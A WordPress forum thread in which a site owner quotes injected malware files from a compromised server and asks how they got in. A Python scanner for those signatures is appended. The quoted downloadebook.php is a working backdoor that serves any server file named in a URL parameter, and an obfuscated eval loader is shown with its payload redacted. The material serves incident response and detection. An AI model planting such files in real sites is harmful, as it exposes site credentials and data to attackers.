TinyMCE folder and php file virus

  • Chad

    (@chadwebsitesdepot)


    Hi all,

    We’ve been experiencing this massive virus on our server that injects a TinyMCE folder and random .php files throughout the website. I’ve done a site cleanup: install core WordPress, manually re-install plugins and re-download parent and child themes. Has anyone seen this virus before? Is there any way to pinpoint where the virus is coming from?

    Here are examples –

    This is what is inside this file: lkeja9jtww.php
    
    <?php
    
    eval("\n\$dgreusdi = intval(__LINE__) * 337;");

    [code redacted by moderator]

    $a = str_replace($dgreusdi, "E", $a);
    eval (gzinflate(base64_decode($a)));

    This is what is inside this file: downloadebook.php

    <?php
    $file_url = $_GET['filename'];
    header('Content-Type: application/octet-stream');
    header("Content-Transfer-Encoding: Binary"); 
    header("Content-disposition: attachment; filename=\"" . basename($file_url) . "\""); 
    readfile($file_url);

    Thanks in advance!

    -Chad

    • This topic was modified 5 months, 3 weeks ago by Steve Stern.
Viewing 3 replies - 1 through 3 (of 3 total)
  • Is the TinyMCE folder in a theme or a plugin? If it is a plugin I would just delete the plugin and find a different plugin that gives you the TinyMCE editor. If it is part of your theme you will need to contact the theme developer to let them know their theme's code has been compromised.

    Once you have removed the code in question I would carefully follow this guide. When you’re done going through that guide, you may want to implement some (if not all) of the recommended security measures and start backing up your site.

    Once you get your site working again please tag the thread resolved.

  • Chad

    (@chadwebsitesdepot)

    Hi @binarywc,

    The TinyMCE folder is in the root of the website and is not a plugin or theme. This virus adds this folder among other random .php files throughout the folder. I’ve done these steps before but the virus still comes back. Is it possible this could be from a level higher on the server?

  • Anything is possible. Honestly though, it sounds to me like your site has been compromised at a plugin or theme level. Would you mind sharing a list of your plugins and the name of the theme you are using?
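
A scan for the two patterns visible in the files quoted in the original post, as an added example that is not part of the thread or any participant's code: it flags the `eval(gzinflate(base64_decode(...)))` loader and a `readfile()` fed from request input, listing the newest files first so their modification times can be matched against the server's access logs. The function names, the `uploads/` directory and the sample file contents are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Signatures drawn from the two files quoted in the thread.
LOADER = re.compile(rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)
REQ_ASSIGN = re.compile(rb"\$(\w+)\s*=\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")


def classify(data: bytes) -> list[str]:
    """Return the names of the thread's patterns found in one PHP file."""
    hits = []
    if LOADER.search(data):
        hits.append("eval-gzinflate-base64")
    # One-step taint: $x = $_GET[...]; ... readfile($x);
    for var in {m.group(1) for m in REQ_ASSIGN.finditer(data)}:
        if re.search(rb"readfile\s*\(\s*\$" + re.escape(var) + rb"\b", data):
            hits.append("readfile-of-request-input")
            break
    return hits


def scan(root: Path) -> list[tuple[str, list[str]]]:
    """Walk root and list flagged .php files, most recently modified first."""
    found = []
    for path in root.rglob("*.php"):
        hits = classify(path.read_bytes())
        if hits:
            found.append((path.stat().st_mtime, path.relative_to(root).as_posix(), hits))
    found.sort(reverse=True)
    return [(rel, hits) for _, rel, hits in found]


def build_sample_tree(root: Path) -> None:
    """Constructed sample: inert stand-ins for the files quoted in the thread."""
    (root / "uploads").mkdir()  # hypothetical directory name
    (root / "uploads" / "lkeja9jtww.php").write_bytes(
        rb'<?php $a = "PLACEHOLDER"; eval (gzinflate(base64_decode($a)));')
    (root / "downloadebook.php").write_bytes(
        rb"<?php $file_url = $_GET['filename']; readfile($file_url);")
    (root / "index.php").write_bytes(rb"<?php require __DIR__ . '/wp-blog-header.php';")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(Path(tmp))
        for rel, hits in scan(Path(tmp)):
            print(rel, ", ".join(hits))
```

These signatures only match the two shapes shown in the thread; a clean result does not mean the tree is free of other injected files.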
